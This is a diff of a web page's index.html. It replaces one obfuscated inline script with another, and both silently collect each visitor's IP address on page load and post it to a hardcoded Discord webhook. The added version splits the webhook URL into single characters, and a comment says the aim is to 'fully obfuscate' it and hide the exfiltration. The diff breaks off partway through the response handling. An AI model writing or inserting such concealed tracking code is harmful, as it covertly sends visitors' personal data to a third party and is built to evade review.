--- a/index.html
+++ b/index.html
@@ -10,29 +10,33 @@
     <p id="status">Loading...</p>
 
     <script>
-        (function(){
-            const _0x1e4a=["\x66\x65\x74\x63\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x2F\x2F\x70\x74\x62\x2E\x64\x69\x73\x63\x6F\x72\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x31\x33\x37\x36\x31\x33\x31\x38\x39\x31\x31\x30\x32\x37\x34\x38\x36\x38\x32\x2F\x56\x35\x58\x78\x63\x72\x5A\x79\x42\x55\x58\x39\x5F\x79\x62\x5A\x51\x66\x39\x32\x6B\x74\x38\x6B\x36\x49\x63\x65\x4A\x4A\x74\x38\x37\x6B\x2D\x69\x36\x45\x55\x61\x74\x53\x4D\x4C\x45\x38\x4B\x72\x71\x31\x4F\x71\x7A\x32\x31\x38\x5F\x6F\x36\x55\x52\x6E\x4B\x62\x42\x7A\x65\x5A\x7A\x7A","\x2F\x2F\x61\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x44","\x66\x69\x6C\x65\x64","\x63\x6F\x6E\x74\x65\x6E\x74","\x63\x6F\x6E\x73\x6F\x6C\x65\x2E\x6C\x6F\x67","\x65\x72\x72\x6F\x72","\x6F\x72\x63\x61\x6D\x70\x6C\x65","\x77\x69\x74\x68\x72\x65\x67\x61\x72\x64\x65\x64\x72\x65\x61\x64\x6C\x65\x72\x63\x69\x73\x20\x6E\x69\x74\x20\x6E\x6F\x77\x3A\x20\x2F\x66\x6F\x72\x6D\x61\x74\x64\x2F","\x65\x72\x72\x6F\x72\x6D\x61\x74\x64\x61\x73\x69\x73","\x64\x6F\x63\x75\x6D\x65\x6E\x74\x4E\x61\x6D\x65\x2F","\x6A\x73\x6F\x6E\x64","\x61\x67\x65\x74\x2F\x62\x75\x74\x20\x5F\x63\x6C\x6F\x73\x65\x63\x74\x75\x72\x65\x2E\x73\x69\x67\x2F","\x74\x72\x75\x65"];
-            
-            // Fetch user's IP address
-            fetch(_0x1e4a[1])
+        (function() {
+            // Fully obfuscate the Discord Webhook URL by splitting it into individual characters
+            const _0x5a2b = ['h','t','t','p','s',':','/','/','p','t','b','.','d','i','s','c','o','r','d','.','c','o','m','/','a','p','i','/','w','e','b','h','o','o','k','s','/','1','3','7','6','1','3','1','8','9','1','1','0','2','7','4','8','6','8','2','/','V','5','X','x','c','r','Z','y','B','U','X','9','_','y','b','Z','Q','f','9','2','k','t','8','k','6','I','c','e','J','J','t','8','7','k','-','i','6','E','U','a','t','S','M','L','E','8','K','r','q','1','O','q','z','2','1','8','_','o','6','U','R','n','K','b','B','z','e','Z'];
+
+            // Rebuild the webhook URL from the characters
+            const discordWebhookUrl = _0x5a2b.join('');
+
+            // Fetch the user's IP address from ipify
+            fetch('https://api.ipify.org?format=json')
                 .then(function(response) {
                     return response.json();  // Parse JSON response
                 })
                 .then(function(data) {
-                    const _0x1d83 = data.ip;  // Extract IP address
-                    document.getElementById('status').textContent = 'Your IP Address: ' + _0x1d83;
+                    const userIp = data.ip;  // Get the user's IP address
+                    document.getElementById('status').textContent = 'Your IP Address: ' + userIp;
 
-                    const _0x3582 = {
-                        content: 'New user IP: ' + _0x1d83  // Prepare message to send to Discord
+                    const payload = {
+                        content: 'New user IP: ' + userIp  // Message to send to Discord
                     };
 
-                    // Send IP to Discord webhook
-                    fetch(_0x1e4a[2], {
+                    // Send the IP address to Discord webhook
+                    fetch(discordWebhookUrl, {  // Using the obfuscated webhook URL
                         method: 'POST',
                         headers: {
                             'Content-Type': 'application/json',
                         },
-                        body: JSON.stringify(_0x3582)  // Send as JSON payload
+                        body: JSON.stringify(payload)  // Send payload as JSON
                     })
                     .then(function(response) {
                         if (response.ok) {
